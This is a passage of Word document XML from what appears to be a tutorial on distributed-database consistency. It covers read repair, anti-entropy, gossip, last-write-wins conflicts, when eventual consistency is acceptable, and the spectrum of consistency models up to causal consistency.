    <w:p w14:paraId="37AE508C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="3554E898" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client (or coordinator) detects inconsistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156BF1FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Send X=5, version=7 to Node 2 (repair the stale replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EC6BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Next read from Node 2 will return correct value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AD5A4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Anti-entropy (background sync):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332C905" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56B9DB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Periodic background process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024D5C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Compare data between replicas (using Merkle trees for efficiency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30294D18" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  When differences found → transfer the newer version to the stale replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F4E7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF2D0CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cassandra: "nodetool repair" runs anti-entropy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07411594" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DynamoDB: built-in background sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E57EB8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Gossip-based dissemination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B3C47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348424B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When a node receives an update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C807D48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Periodically gossip with random peers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78530AF8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Share the update with them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8C7CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  They gossip to others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B75D91E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Exponential spread: eventually reaches all nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63171EFA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C36D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Time to propagate: O(log N) gossip rounds for N nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F82CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Last-Write-Wins (LWW) conflict resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A1058" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01F54F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Two concurrent writes to the same key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C9C68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 1: X=5 at timestamp T1=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56793146" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 2: X=7 at timestamp T2=102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02642F10" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E2A1D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When replicas sync: compare timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552884F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  T2 &gt; T1 → X=7 wins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A440D27" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node 1 updates to X=7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB94B76" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290D3D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Convergence achieved — but the write with T1=100 is silently LOST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BE77A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Advantages of Eventual Consistency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294"/>
        <w:gridCol w:w="6174"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="33C9763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8BFD46" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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804AFB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="432341B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CA1A7D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Write latency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6711D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Minimal (local write only, no waiting for replicas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="24F298F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9BD0B5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Availability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A28C72" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Maximum (write succeeds even if other nodes are down)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2B42C3D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E38511" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Throughput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749345" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Higher (no coordination overhead)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="445573D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5EE53E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Partition tolerance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8D5DD4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Continues operating during network splits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="522E7B5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49F98A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:lastRenderedPageBreak/>
              <w:t>Cross-region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F6F554" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Low-latency writes everywhere (async replication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="224B355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3DD087" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Scalability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75BFC8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Easy to add nodes without increasing coordination cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A4A5B11" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Where Eventual Consistency Is Acceptable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243"/>
        <w:gridCol w:w="5529"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2C5F65A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947CCE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case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84DEAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why Eventually Consistent Is Fine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="5FFE67F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CB39C4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Social media feeds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73F157" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Seeing a post 2 seconds late is imperceptible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="0F4516E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E7C5B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Product catalog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9842BC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Price updated 5 seconds late is acceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="24603BD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8CE925" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>User profile (read by others)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D91DFE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Others can see old profile briefly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="229F29A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E390A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>DNS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311FD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>TTL-based propagation is inherently eventual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2876073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0E9445" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Shopping cart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5B0905" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Brief staleness is tolerable (reconcile at checkout)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="132B529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FEBEBD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Analytics/metrics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E82DA2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Approximate counts are sufficient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="0C605A3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0BD07C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Content recommendations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49DAEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Slight staleness doesn't affect quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="10A6320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71C639" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>CDN caches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CE552C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Stale content served until TTL expires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="1D7978E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D932F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Search indices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852F6E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Search results update with small delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5820567D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="6CC65993">
          <v:rect id="_x0000_i6039" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2DD10" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. The Consistency Spectrum — Models Between Strong and Eventual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62079EFA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 It's Not Binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AD9E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Strong and eventual consistency are the two extremes. Real systems often provide models in between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73354648" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6252D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Strongest ──────────────────────────────────────────── Weakest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D1446" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="3CDFB4F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Linearizability → Sequential → Causal → Read-your-writes → Monotonic reads → Eventual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E6B87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     │                │            │            │                  │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E0074A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     │                │            │            │                  │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584756E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "One copy"    "Global    "Respects    "See own      "Never go     "Eventually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599C4BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   behavior"     order"    causality"   writes"       backward"      converge"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D874F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Causal Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DCDD2E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> If operation A causally precedes operation B (B depends on A), then ALL nodes observe A before B. Operations that are NOT causally related (concurrent) may be observed in any order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1E14BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E6736" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A4035" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Alice posts: "I got promoted!"        (event A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E16EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bob (seeing Alice's post) comments: "Congrats!" (event B, caused by A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2ABF6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBCDBE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Causal consistency guarantees:</w:t>
      </w:r>
    </w:p>
